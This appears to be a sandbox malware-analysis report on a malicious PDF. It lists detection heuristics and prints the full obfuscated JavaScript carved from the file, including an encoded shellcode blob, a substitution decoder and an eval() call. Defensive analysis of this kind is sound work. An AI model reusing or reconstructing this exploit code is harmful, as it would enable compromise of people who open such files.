MALICIOUS
166
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
The PDF file contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. A high-severity PDF_EVAL heuristic firing suggests the use of eval(), a common technique for obfuscating malicious code. The extracted JavaScript file, javascript_obj0007_000.js, is likely responsible for downloading and executing a second-stage payload. The obfuscation and use of eval() reduce confidence in precisely determining the script's full intent.
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics 4
-
JavaScript action low 2 related findings PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTERPDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.Matched line in script
5hmjjSlb84=4zgP.(FAP1\"%znvnv%znvnv%znvnv%z{H)u%zvv<u%zDD}c%zy{uc%zy{{f%z)Hvv%z)Jnv%z)uH,%z)y{<%zHH)}%zHHHH%zyutH%zCHn)%z)H)H%zDn)H%z)v,H%zcHDn%znJHv%zcHDn%zD))t%z)H{v%z)H)u%zDn)H%zuc{v%zDfyt%z)f,f%z{t{v%z)Hff%z)H)H%z,,DD%zuc)u%zttyt%zD<ff%z{t)f%z)HfH%z)H)H%z,,DD%zuc)t%z},yt%zf{<H%z{tJC%z)H{C%z)H)H%z,,DD%zuc)v%z{{yt%z{HJf%z{tyH%z)Hvu%z)H)H%z,,DD%zucHH%zJ)yt%z{,cD%z{t<t%z)HJc%z)H)H%z,,DD%z,HHu%zCtDH%zc,J}%zDDf<%zHt,,%z)y{D%z)H))%zuf)H%zc,DD%zDn}u%z)u,,%z))y<%zDnuD%zHtu,%z{tuc%z)HDn%z)H)H%zytuH%zH … -
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0007_000.js |
pdf-javascript-stream | PDF /JS object 7 at offset 0x248 | 8015 bytes |
SHA-256: 633ce5c500d282c65aa100312ce17f9739936b3c490237d6cc97828c6d94c771 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 eval/decoder/string-building token(s). 91 of 158 identifiers look randomly generated (e.g. 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmn') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
function A31bTjE8(A31bTjE8,FNeG5DFa4aPZL) {var SLaUStU8=A31bTjE8. substr (FNeG5DFa4aPZL, 1);return SLaUStU8;}/*iHnrVOQ|PE9aPb4rN1Gy|SHrtb9dw7mUFQ*/function XAOLLDioh(jI337y0YJNF) {/*aeR3t|AKlUFSh7ZW|sdKc5K5rIiBN*/var jAwpSJBm = new String("<>(){} .,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789");/*CoTUhDqbORvTkTQ9pt[J3KEEGvMoxZdzEwJ]AzCEHyYrHorwYZ*//*SjAWqwiUj8yYCkiobYrf|f4Nni4a7UWQ4W|kIL5rKtGNUp1vE*/var YnpjysIcQgB /*RkELxrusHrCe76[kh9wcr6LyJgeBRikiI]u6WeoeMr8KozuLz*/= new String("Mo1q2k4Op,u}C)Hr G9I>0jUNTdS5hbEB3VFw(RPWl8seZxYgQAai.mz6XL7K{fJvn<Dtyc");/*ogdzUmVynnXNM|A6cPaHtnzsxdi|pXET3hJOJfDxJ*/for(a4VOvtY8zki=0;a4VOvtY8zki<jAwpSJBm.length;a4VOvtY8zki++) {if(jI337y0YJNF == A31bTjE8(YnpjysIcQgB, a4VOvtY8zki)) {/*AV63RZIsg2V[lIzJqeguya]AocdsPmJQ*/return A31bTjE8(jAwpSJBm, a4VOvtY8zki);/*FJPfS7BKTXvcM4Irb3f1 <dgo6O3iX]gdTv8lt*/}}return jI337y0YJNF;}/*vDYhf[coS3hxvtRRYNgR]AbTYuEWWyXI1vpWWH*//*oBjcw|tDr7k8uea|AKIPh*/var ARRVe6yqxr = new String;var OBGTApYNJeINk = new String("\n6Fi4U>P N9IAbaYP5tsX4=4gPX4,iiF71q;\n6Fi4mKd{U6YsczgnfBbE;\nWzg(msQg4d{gGSyy77zRdf>U 1laTexCdzcH7cY5WWp40SLDF<<378fKnNrUq2\n44X8sxP41laTexCdzcH7cY5WWOxPglm84*4J4M40SLDF<<378fKnNrUq2\n4444laTexCdzcH7cY5WW4+=4laTexCdzcH7cY5WW;\n44k\n44laTexCdzcH7cY5WW4=4laTexCdzcH7cY5WWO.zw.misgl1{p40SLDF<<378fKnNrU4/4Jq;\n44iPmzig4laTexCdzcH7cY5WW;\nk\nWzg(msQg4T8cJzF6nAm}(ji K1j)Dz9{5Gih zm3Gcq2\n446Fi4,d{,JD)iKT50 x0w4=4{L{({({({(;\n446Fi4rdE9wf(5hmjjSlb84=4zgP.(FAP1\"%znvnv%znvnv%znvnv%z{H)u%zvv<u%zDD}c%zy{uc%zy{{f%z)Hvv%z)Jnv%z)uH,%z)y{<%zHH)}%zHHHH%zyutH%zCHn)%z)H)H%zDn)H%z)v,H%zcHDn%znJHv%zcHDn%zD))t%z)H{v%z)H)u%zDn)H%zuc{v%zDfyt%z)f,f%z{t{v%z)Hff%z)H)H%z,,DD%zuc)u%zttyt%zD<ff%z{t)f%z)HfH%z)H)H%z,,DD%zuc)t%z},yt%zf{<H%z{tJC%z)H{C%z)H)H%z,,DD%zuc)v%z{{yt%z{HJf%z{tyH%z)Hvu%z)H)H%z,,DD%zucHH%zJ)yt%z{,cD%z{t<t%z)HJc%z)H)H%z,,DD%z,HHu%zCtDH%zc,J}%zDDf<%zHt,,%z)y{D%z)H))%zuf)H%zc,DD%zDn}u%z)u,,%z))y<%zDnuD%zHtu,%z{tuc%z)HDn%z)H)H%zytuH%zH<Cc%zcH}{%zty{t%z)H)H%zDD)H%zHv,,%zJ,Dn%zJHD}%zDDuH%z}H,,%zf{yt%z)H)H%zuH)H%z,,Dn%zy<Hu%zuD)C%zu,Dn%z{tHt%z)Hy)%z)H)H%z,,)}%zJy}H%zuv)H%z}fcf%zJyy,%z)u,H%zy,ct%z)H)H%zc,f{%zDn}H%z)v,,%z))y<%zDnuD%zHtu,%z,H{t%z)H)H%zy<)H%zut)y%z,,)}%zC}}u%zu}vn%zf{u}%z}Hc,%zu}uH%z,,Dn%zy<Hv%zuD),%zu,Dn%z{tHt%z)H}}%z)H)H%z)Hy<%zc,f{%zDn}H%z)t,,%z)Cy<%zDnuD%zHtu,%zHH{t%z)H)H%zy<)H%zDnf{%zHH,,%z))y<%zDnuD%zHtu,%z)H{t%z)H)H%z,))H%zuCun%z{))}%z{))}%z{))}%z{))}%z{vD}%zu<)u%zDnu}%z{Cv<%zuCfy%z{Hf{%zDnu,%zDn{v%z)tcJ%zuJDn%zuc)v%zc}Dn%zDnCv%zHfcu%z)}ct%zucf}%zccDn%z)}}H%zC}f}%z,DJD%znJ,)%zJ})}%zC}uc%z){fc%zHH<f%zfCC<%z)tcu%zJfJ)%z)})J%z,HfC%zf){n%zffCn%zc,uf%zu<{,%z{nDn%zu<Dn%z)}}u%zycvJ%z)vDn%zDn,n%zHvu<%zvJ)}%z)uDn%z)}Dn%zufJ,%zJCuJ%z)H)t%zfu{t%zf{ff%zu,f{%z,vuC%z,{,J%z)H,f%ztnDy%zt{tn%zJHv,%zDnJH%zDCv{%zvfDf%ztvD)%zDcJ)%zDDD)%zJHDH%zD}DJ%zDtDH%zD}JH%zDfDH%zJ)Dn%zDyt{%zvHt{%zDnDc%zvcvC%z{{vv\"q;\n44sW41j)Dz9{5Gih zm3Gc4==4fq2\n4444,d{,JD)iKT50 x0w4=4{Lv{v{v{v{;\n4444rdE9wf(5hmjjSlb84=4zgP.(FAP1\"%znvnv%znvnv%znvnv%z{H)u%zvv<u%zDD}c%zy{uc%zy{{f%z)Hvv%z)Jnv%z)uH,%z)y{<%zHH)}%zHHHH%zyutH%zCHn)%z)H)H%zDn)H%z)v,H%zcHDn%znJHv%zcHDn%zD))t%z)H{v%z)H)u%zDn)H%zuc{v%zDfyt%z)f,f%z{t{v%z)Hff%z)H)H%z,,DD%zuc)u%zttyt%zD<ff%z{t)f%z)HfH%z)H)H%z,,DD%zuc)t%z},yt%zf{<H%z{tJC%z)H{C%z)H)H%z,,DD%zuc)v%z{{yt%z{HJf%z{tyH%z)Hvu%z)H)H%z,,DD%zucHH%zJ)yt%z{,cD%z{t<t%z)HJc%z)H)H%z,,DD%z,HHu%zCtDH%zc,J}%zDDf<%zHt,,%z)y{D%z)H))%zuf)H%zc,DD%zDn}u%z)u,,%z))y<%zDnuD%zHtu,%z{tuc%z)HDn%z)H)H%zytuH%zH<Cc%zcH}{%zty{t%z)H)H%zDD)H%zHv,,%zJ,Dn%zJHD}%zDDuH%z}H,,%zf{yt%z)H)H%zuH)H%z,,Dn%zy<Hu%zuD)C%zu,Dn%z{tHt%z)Hy)%z)H)H%z,,)}%zJy}H%zuv)H%z}fcf%zJyy,%z)u,H%zy,ct%z)H)H%zc,f{%zDn}H%z)v,,%z))y<%zDnuD%zHtu,%z,H{t%z)H)H%zy<)H%zut)y%z,,)}%zC}}u%zu}vn%zf{u}%z}Hc,%zu}uH%z,,Dn%zy<Hv%zuD),%zu,Dn%z{tHt%z)H}}%z)H)H%z)Hy<%zc,f{%zDn}H%z)t,,%z)Cy<%zDnuD%zHtu,%zHH{t%z)H)H%zy<)H%zDnf{%zHH,,%z))y<%zDnuD%zHtu,%z)H{t%z)H)H%z,))H%zuCun%z{))}%z{))}%z{))}%z{))}%z{vD}%zu<)u%zDnu}%z{Cv<%zuCfy%z{Hf{%zDnu,%zDn{v%z)tcJ%zuJDn%zuc)v%zc}Dn%zDnCv%zHfcu%z)}ct%zucf}%zccDn%z)}}H%zC}f}%z,DJD%znJ,)%zJ})}%zC}uc%z){fc%zHH<f%zfCC<%z)tcu%zJfJ)%z)})J%z,HfC%zf){n%zffCn%zc,uf%zu<{,%z{nDn%zu<Dn%z)}}u%zycvJ%z)vDn%zDn,n%zHvu<%zvJ)}%z)uDn%z)}Dn%zufJ,%zJCuJ%z)H)t%zfu{t%zf{ff%zu,f{%z,vuC%z,{,J%z)H,f%ztnDy%zt{tn%zJHv,%zDnJH%zDCv{%zvfDf%ztvD)%zDcJ)%zDDD)%zJHDH%zD}DJ%zDtDH%zD}JH%zDfDH%zJ)Dn%zDyt{%zvHt{%zDnDc%zvcvC%z{{vv\"q;\n44k\n44Px.P4sW41j)Dz9{5Gih zm3Gc4==4Jq2\n4444rdE9wf(5hmjjSlb84=4zgP.(FAP1\"%znvnv%znvnv%znvnv%z{H)u%zvv<u%zDD}c%zy{uc%zy{{f%z)Hvv%z)Jnv%z)uH,%z)y{<%zHH)}%zHHHH%zyutH%zCHn)%z)H)H%zDn)H%z)v,H%zcHDn%znJHv%zcHDn%zD))t%z)H{v%z)H)u%zDn)H%zuc{v%zDfyt%z)f,f%z{t{v%z)Hff%z)H)H%z,,DD%zuc)u%zttyt%zD<ff%z{t)f%z)HfH%z)H)H%z,,DD%zuc)t%z},yt%zf{<H%z{tJC%z)H{C%z)H)H%z,,DD%zuc)v%z{{yt%z{HJf%z{tyH%z)Hvu%z)H)H%z,,DD%zucHH%zJ)yt%z{,cD%z{t<t%z)HJc%z)H)H%z,,DD%z,HHu%zCtDH%zc,J}%zDDf<%zHt,,%z)y{D%z)H))%zuf)H%zc,DD%zDn}u%z)u,,%z))y<%zDnuD%zHtu,%z{tuc%z)HDn%z)H)H%zytuH%zH<Cc%zcH}{%zty{t%z)H)H%zDD)H%zHv,,%zJ,Dn%zJHD}%zDDuH%z}H,,%zf{yt%z)H)H%zuH)H%z,,Dn%zy<Hu%zuD)C%zu,Dn%z{tHt%z)Hy)%z)H)H%z,,)}%zJy}H%zuv)H%z}fcf%zJyy,%z)u,H%zy,ct%z)H)H%zc,f{%zDn}H%z)v,,%z))y<%zDnuD%zHtu,%z,H{t%z)H)H%zy<)H%zut)y%z,,)}%zC}}u%zu}vn%zf{u}%z}Hc,%zu}uH%z,,Dn%zy<Hv%zuD),%zu,Dn%z{tHt%z)H}}%z)H)H%z)Hy<%zc,f{%zDn}H%z)t,,%z)Cy<%zDnuD%zHtu,%zHH{t%z)H)H%zy<)H%zDnf{%zHH,,%z))y<%zDnuD%zHtu,%z)H{t%z)H)H%z,))H%zuCun%z{))}%z{))}%z{))}%z{))}%z{vD}%zu<)u%zDnu}%z{Cv<%zuCfy%z{Hf{%zDnu,%zDn{v%z)tcJ%zuJDn%zuc)v%zc}Dn%zDnCv%zHfcu%z)}ct%zucf}%zccDn%z)}}H%zC}f}%z,DJD%znJ,)%zJ})}%zC}uc%z){fc%zHH<f%zfCC<%z)tcu%zJfJ)%z)})J%z,HfC%zf){n%zffCn%zc,uf%zu<{,%z{nDn%zu<Dn%z)}}u%zycvJ%z)vDn%zDn,n%zHvu<%zvJ)}%z)uDn%z)}Dn%zufJ,%zJCuJ%z)H)t%zfu{t%zf{ff%zu,f{%z,vuC%z,{,J%z)H,f%ztnDy%zt{tn%zJHv,%zDnJH%zDCv{%zvfDf%ztvD)%zDcJ)%zDDD)%zJHDH%zD}DJ%zDtDH%zD}JH%zDfDH%zJ)Dn%zDyt{%zvHt{%zDnDc%zvcvC%z{{vv\"q;\n44k\n446Fi46W.{ZtfZEhtQHSTH4=4{Ln{{{{{;\n446Fi4uLVELuKS<jAEn>)u4=4rdE9wf(5hmjjSlb8OxPglm84*4J;\n446Fi40SLDF<<378fKnNrU4=46W.{ZtfZEhtQHSTH4-41uLVELuKS<jAEn>)u4+4{Lvyq;\n446Fi4laTexCdzcH7cY5WW4=4zgP.(FAP1\"%zc{c{%zc{c{\"q;\n44laTexCdzcH7cY5WW4=4d{gGSyy77zRdf>U 1laTexCdzcH7cY5WWp40SLDF<<378fKnNrUq;\n446Fi4Ly>YC>EZA(VDDKIK4=41,d{,JD)iKT50 x0w4-4{Ln{{{{{q4/46W.{ZtfZEhtQHSTH;\n44WQi416Fi4}zEzDb0,.}8X3XyV4=4{;4}zEzDb0,.}8X3XyV4M4Ly>YC>EZA(VDDKIK;4}zEzDb0,.}8X3XyV4++4q2\n4444U>P N9IAbaYP5tsX[}zEzDb0,.}8X3XyV]4=4laTexCdzcH7cY5WW4+4rdE9wf(5hmjjSlb8;\n44k\nk\nWzg(msQg47S> QiJPhFeVF<VB1q2\n446Fi4KDdnFQC5J6NViBcz4=4{;\n446Fi4}5uQ>CSAg}UUrL6)4=4FAAO6sPXPibPi.sQgOmQSmisgl1q;\n44FAAO(xPFi5sYPUzm1mKd{U6YsczgnfBbEq;\n\n44sW41}5uQ>CSAg}UUrL6)4M4tOfq2\n4444T8cJzF6nAm}(ji K1{q;\n44446Fi4hjGRubtCdbYGvzCv4=4zgP.(FAP1\"%z{({(%z{({(\"q;\n4444X8sxP41hjGRubtCdbYGvzCvOxPglm84M4nnc<JqhjGRubtCdbYGvzCv4+=4hjGRubtCdbYGvzCv;\n4444m8s.4O(QxxFwSmQiP4=4}QxxFwO(QxxP(m)YFsxGgWQ12\n444444.zwe4:4\"\"p4Y.l4:4hjGRubtCdbYGvzCv\n4444k\n4444q;\n44k\nsW41}5uQ>CSAg}UUrL6)4o=4cq2\n4444mi742\nsW41FAAORQ(O}QxxFwOlPmG(Qgq2\n44444444T8cJzF6nAm}(ji K1Jq;\n444444446Fi4rUie(IVTE7QY6ZJ74=4zgP.(FAP1\"%{c\"q;\n44444444X8sxP41rUie(IVTE7QY6ZJ7OxPglm84M4{Ln{{{qrUie(IVTE7QY6ZJ74+=4rUie(IVTE7QY6ZJ7;\n44444444rUie(IVTE7QY6ZJ74=4\"jO\"4+4rUie(IVTE7QY6ZJ7;\nFAAORQ(O}QxxFwOlPmG(Qg1rUie(IVTE7QY6ZJ7q;\n44444444KDdnFQC5J6NViBcz4=4f;\n444444k\n444444Px.P42\n44444444KDdnFQC5J6NViBcz4=4f;\n444444k\n4444k\n4444(Fm(841Pq2\n444444KDdnFQC5J6NViBcz4=4f;\n4444k\n4444sW41KDdnFQC5J6NViBcz4==4fq2\n444444sW411}5uQ>CSAg}UUrL6)4o=4tOf&&4}5uQ>CSAg}UUrL6)4M4cqq2\n44444444T8cJzF6nAm}(ji K1fq;\n444444446Fi499(9AsEr)G3 CY9(4=4\"fJcccccccccccccccccc\";\n44444444WQi41 u>gb6CJmvQAYAQm4=4{;4 u>gb6CJmvQAYAQm4M4JtD;4 u>gb6CJmvQAYAQm4++4q2\n444444444499(9AsEr)G3 CY9(4+=4\"y\";\n44444444k\n44444444zmsxOAisgmW1\"%n<{{{W\"p499(9AsEr)G3 CY9(q;\n444444k\n4444k\n44k\nk\nFAAO T}Lce)jvYPHV7ie4=47S> QiJPhFeVF<VB;\nmKd{U6YsczgnfBbE4=4FAAO.Pm5sYPUzm1\"FAAO T}Lce)jvYPHV7ie1q\"p4f{q;\n");/*npyYVLvcMZev2QEmUvk4{UZKYRVhh2eKhTj3e}Vru0dnHhPb*//*AWDKvOjDjH|clv95U2ZpOHZFk|MISnc*/for(HAygLKbdcw7Zkn=0;HAygLKbdcw7Zkn<OBGTApYNJeINk.length;HAygLKbdcw7Zkn++)ARRVe6yqxr += XAOLLDioh(A31bTjE8(OBGTApYNJeINk,HAygLKbdcw7Zkn));eval(ARRVe6yqxr);/*AfTvu3z[AZvmLvhfo7]AFk8poK*/
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.